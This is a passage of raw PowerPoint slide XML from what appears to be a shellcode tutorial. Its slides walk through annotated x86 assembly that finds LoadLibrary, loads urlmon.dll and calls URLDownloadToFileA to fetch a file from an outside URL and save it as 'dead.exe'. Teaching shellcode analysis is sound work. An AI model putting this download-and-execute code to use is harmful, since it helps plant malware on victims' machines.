              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Find LoadLibrary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2364700"/>
            <a:ext cx="8534400" cy="2893100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000055  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000057  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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00000058  682E657865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0x6578652e    ; .exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000005D  6864656164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0x64616564    ; dead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000062  53                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 ; Kernel32 base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000063  52                push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                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProcAddress</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00000064  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 ; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000065  6861727941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0x41797261    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aryA</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0000006A  684C696272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0x7262694c    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Libr</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0000006F  684C6F6164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0x64616f4c    ; Load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000074  54                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</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LoadLibrary</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00000075  53                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 ; Kernel32 base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000076  FFD2              call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                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProcAddress(LL)</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496669"/>
            <a:ext cx="5486400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Load a DLL (urlmon.dll)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2490787"/>
            <a:ext cx="8534400" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000078  83C40C            add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp,byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +0xc      ; pop "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoadLibrary</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0000007B  59                pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000007C  50                push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               ; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoadLibrary</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0000007D  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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0000007E  66B96C6C          mov cx,0x6c6c          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ll</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00000082  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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00000083  686F6E2E64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0x642e6e6f  ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on.d</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00000088  6875726C6D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0x6d6c7275  ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlm</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0000008D  54                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               ; "urlmon.dll"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000008E  FFD0              call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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO"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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("urlmon.dll")</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28600"/>
            <a:ext cx="5486400" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Get function from DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(URLDownloadToFile)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2362200"/>
            <a:ext cx="8534400" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000090  83C410            add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp,byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +0x10       ; Clean stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000093  8B542404          mov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,[esp+0x4]        ; EDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProcAddress</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00000097  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000099  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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0000009A  66B96541          mov cx,0x4165            ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eA</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0000009E  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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0000009F  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000A1  686F46696C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0x6c69466f    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oFil</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000000A6  686F616454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0x5464616f    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oadT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000000AB  686F776E6C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0x6c6e776f    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ownl</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000000B0  6855524C44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0x444c5255    ; URLD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000B5  54                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</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URLDownloadToFileA</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000000B6  50                push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urlmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000B7  FFD2              call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                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProc(URLDown)</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496669"/>
            <a:ext cx="5486400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Call URLDownloadToFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8534400" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000B9  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000BB  8D542424          lea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,[esp+0x24]       ; EDX = "dead.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000BF  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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000000C0  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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000000C1  52                push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                 ; "dead.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000C2  EB47              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> short 0x10b          ; Will see</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000C4  51                push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 ; 0 from 10b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000C5  FFD0              call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                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO"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Will put URL pointer on the stack as return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (call)</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000010B  E8B4FFFFFF        call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0xc4</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bflow.security-portal.cz/down/xy.txt</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00000110  687474703A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0x3a707474 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
